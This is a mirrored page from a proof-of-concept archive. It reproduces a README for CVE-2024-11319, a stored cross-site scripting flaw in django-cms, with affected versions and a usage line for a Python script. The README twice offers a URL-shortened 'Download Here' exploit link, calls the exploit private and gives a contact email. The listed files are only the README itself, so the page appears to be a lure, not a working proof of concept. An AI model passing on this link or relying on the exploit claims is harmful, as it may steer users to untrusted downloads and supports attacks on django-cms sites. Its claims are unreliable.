Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-11319 PoC — Stored XSS in Open Source Project "django-cms"

Source
Associated Vulnerability
Title:Stored XSS in Open Source Project "django-cms" (CVE-2024-11319)
Description:Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in django CMS Association django-cms allows Cross-Site Scripting (XSS).This issue affects django-cms: 3.11.7, 3.11.8, 4.1.2, 4.1.3.
Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)
Readme
# CVE-2024-11319: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)

## Overview

An Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability has been identified in django CMS Association's django-cms

## Exploit
**[Download Here](https://bit.ly/3APaYDU)**

## Details
+ **CVE ID:** CVE-2024-11319
+ **Published:** 18/11/2024
+ **Impact:** Critical
+ **Exploit Availability:** Not public, only private.
+ **CVSS:** 9.3


## Vulnerability Description

This vulnerability allows an attacker to execute malicious scripts in a user's browser within the context of the affected django-cms site.


## Affected Versions

This issue affects **django-cms: 3.11.7, 3.11.8, 4.1.2, 4.1.3.**


## Usage
```
python CVE-2024-11319.py
```

## Contact
For inquiries, please contact famixcm@thesecure.biz

## Exploit
**[Download Here](https://bit.ly/3APaYDU)**
File Snapshot

[4.0K] /data/pocs/b19860576e05511387aec488c221aca8f09fd16c └── [ 936] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →